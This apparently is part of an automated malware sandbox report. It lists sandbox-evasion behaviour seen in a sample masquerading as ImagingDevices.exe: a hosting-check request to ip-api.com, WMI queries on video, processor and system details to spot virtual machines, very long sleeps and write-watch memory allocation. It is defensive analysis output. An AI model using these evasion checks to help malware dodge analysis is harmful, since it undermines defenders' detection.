Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 3270000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 24F70000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 24D80000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 24960000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 24800000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599888
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599776
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599664
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599554
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599443
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599332
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599204
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599076
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598964
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598852
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598741
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598630
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598518
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598391
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598279
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598167
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598056
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597945
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597833
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597715
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597610
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597482
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597370
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597258
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597146
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597034
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596906
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596794
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596682
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596571
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596460
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596348
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596220
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596093
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595981
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595870
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595760
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595647
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595537
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595425
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595300
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595173
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595045
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594933
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594822
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594711
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594599
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594471
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594343
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7791
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3818
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6010
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Window / User API: threadDelayed 387
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Window / User API: threadDelayed 9707

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092	Thread sleep count: 2109 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096	Thread sleep count: 7791 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6192	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108	Thread sleep count: 3818 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108	Thread sleep count: 6010 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7044	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780	Thread sleep count: 387 > 30
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599888s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599776s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780	Thread sleep count: 134 > 30
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599664s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599554s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599443s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599332s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780	Thread sleep count: 9707 > 30
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599204s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599076s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598964s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598852s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598741s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598630s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598518s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598391s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598279s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598167s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598056s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597945s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597833s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597715s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597610s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597482s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597370s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597258s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597146s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597034s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596906s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596794s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596682s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596571s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596460s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596348s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596220s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596093s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595981s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595870s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595760s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595647s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595537s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595425s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595300s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595173s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595045s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594933s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594822s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594711s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594599s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594471s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594343s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 1172	Thread sleep time: -922337203685477s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599888
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599776
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599664
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599554
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599443
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599332
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599204
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599076
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598964
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598852
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598741
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598630
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598518
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598391
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598279
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598167
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598056
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597945
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597833
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597715
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597610
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597482
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597370
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597258
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597146
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597034
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596906
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596794
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596682
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596571
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596460
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596348
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596220
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596093
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595981
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595870
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595760
